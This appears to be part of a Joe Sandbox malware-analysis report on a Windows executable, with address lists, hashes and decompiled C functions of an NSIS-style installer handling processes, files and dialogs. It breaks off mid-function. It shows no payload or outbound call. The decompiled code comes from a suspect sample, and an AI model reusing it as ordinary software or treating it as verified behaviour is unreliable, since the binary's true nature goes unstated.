                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x0040676b
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x00000000
                0x00406771
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004066f2
                0x004066ef

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                • Instruction ID: eed9497ed027258a65708919b4ea66700c8fb804c6c24b7440c20fb41b46c6b0
                • Opcode Fuzzy Hash: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                • Instruction Fuzzy Hash: 57715671D00229CFEF28CF98C844BADBBB1FB44305F15806AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E76 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00401E76() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A85(_t24);
				E00404E9F(0xffffffeb, _t13);
				_t15 = E00405361(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405E13(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x3c); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x3c) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405A52(_t26,  *(_t31 - 0x3c));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                0x00401e7c
                0x00401e81
                0x00401e87
                0x00401e8e
                0x00401e91
                0x004026bf
                0x00401e97
                0x00401e9a
                0x00401eab
                0x00401ea6
                0x00401ea6
                0x00401ec0
                0x00401ec9
                0x00401ed9
                0x00401edb
                0x00401edb
                0x00401ecb
                0x00401ecf
                0x00401ecf
                0x00401ec9
                0x00401ee2
                0x00401ee5
                0x00401ee5
                0x0040291d
                0x00402929

                APIs
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                  • Part of subcall function 00405361: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                  • Part of subcall function 00405361: CloseHandle.KERNEL32(?), ref: 00405393
                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EB0
                • GetExitCodeProcess.KERNELBASE ref: 00401EC0
                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EE5
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                • String ID:
                • API String ID: 3521207402-0
                • Opcode ID: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                • Instruction ID: 7da7f48acba4dd0e4cefddd12cfcc923695080b3e0b12fbb56f2b87fe8ee5a54
                • Opcode Fuzzy Hash: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                • Instruction Fuzzy Hash: D9012D31D04105EBCB21AFA5DD85A9E7AB5EF40344F14803BFA05B61E1C7BD4A41DF9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403664 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403664() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t6;
				signed int _t11;

				_t1 =  *0x409020; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409020 =  *0x409020 | 0xffffffff;
				}
				_t2 =  *0x409024; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409024 =  *0x409024 | 0xffffffff;
					_t11 =  *0x409024;
				}
				_t3 = E00405426(_t6, _t11, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nsm4D7E.tmp\\", 7); // executed
				return _t3;
			}








                0x00403664
                0x00403673
                0x00403676
                0x00403678
                0x00403678
                0x0040367f
                0x00403687
                0x0040368a
                0x0040368c
                0x0040368c
                0x0040368c
                0x0040369a
                0x004036a0

                APIs
                • CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 00403676
                • CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 0040368A
                Strings
                • C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\, xrefs: 00403695
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID: C:\Users\user\AppData\Local\Temp\nsm4D7E.tmp\
                • API String ID: 2962429428-1191056838
                • Opcode ID: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                • Instruction ID: 388c8ae895ed4ea73890f6290ee17e3c52ce59555f833da3370ec015b8cfd073
                • Opcode Fuzzy Hash: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                • Instruction Fuzzy Hash: CCE01235D0472066C628AB7CFE49E553B69AB053357640726F238F62F1C7789C428A5C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040327D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040327D(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                0x00403281
                0x00403294
                0x0040329c
                0x00000000
                0x004032a3
                0x00000000
                0x004032a5

                APIs
                • ReadFile.KERNELBASE(?,00000000,00000000,00000000,tCPInfo,00000000,0040311B,tCPInfo,00004000,?,00000000,00000020,00000020,00402FA7,00000004,00000000), ref: 00403294
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileRead
                • String ID: tCPInfo
                • API String ID: 2738559852-2120998202
                • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                • Instruction ID: fb6a36c91f62b4f1fc6c0be421fc724d0e407ee9a1d4d48bf35ddf6d218f7e68
                • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                • Instruction Fuzzy Hash: FAE08C32510219BBCF105E519C00EA73F6CEB093A2F008036F904E5190D238EA10DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f50; // 0x74df7c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x42370c =  *0x42370c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x42370c, 0x7530,  *0x4236f4), 0);
					}
				}
				return 0;
			}











                0x0040138a
                0x004013fa
                0x00401392
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
                0x004013c2
                0x004013b9
                0x004013b9
                0x004013ba
                0x004013ba
                0x004013c9
                0x004013cb
                0x004013f4
                0x004013f4
                0x004013c9
                0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                • Instruction ID: 84a05c9b45cf4c5fa881fbb5f17894f913db592f6cd276ec9e0bf70eb6e0573e
                • Opcode Fuzzy Hash: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                • Instruction Fuzzy Hash: 1E01F471B242119BE7294F789D05B2A36A8E710325F10823BFA55F66F1D67CDC028B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057CB Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E004057CB(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                0x004057cf
                0x004057dc
                0x004057f1
                0x004057f7

                APIs
                • GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 004057CF
                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$AttributesCreate
                • String ID:
                • API String ID: 415043291-0
                • Opcode ID: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                • Instruction ID: f93c687e1e26e3b8db63236639f9d4e14dddfc66631b4e0972b173020c912dad
                • Opcode Fuzzy Hash: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                • Instruction Fuzzy Hash: 8DD09E31658201EFEF098F20DD16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057AC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004057AC(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                0x004057b0
                0x004057b9
                0x004057c2
                0x00000000
                0x004057c2
                0x004057c8

                APIs
                • GetFileAttributesA.KERNELBASE(?,004055B7,?,?,?), ref: 004057B0
                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004057C2
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                • Instruction ID: 1d3fe654247a7333bacfc0572c6a5cb341717cd3e61d1346c3f88923170604c5
                • Opcode Fuzzy Hash: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                • Instruction Fuzzy Hash: 95C04C71818501EBD6015B24EF09C1F7F66EB50721B508B35F469E00F0C7359C66EA2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004032AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004032AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                0x004032bd
                0x004032c3

                APIs
                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,00007DE4), ref: 004032BD
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FilePointer
                • String ID:
                • API String ID: 973152223-0
                • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00404FDD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00404FDD(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				struct HMENU__* _t89;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423704; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F71, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t89 = CreatePopupMenu();
							_push(0xffffffe1);
							_push(_t149);
							_t160 = _t89;
							AppendMenuA(_t160, _t149, 1, E00405B16(_t149, _t154, _t160));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
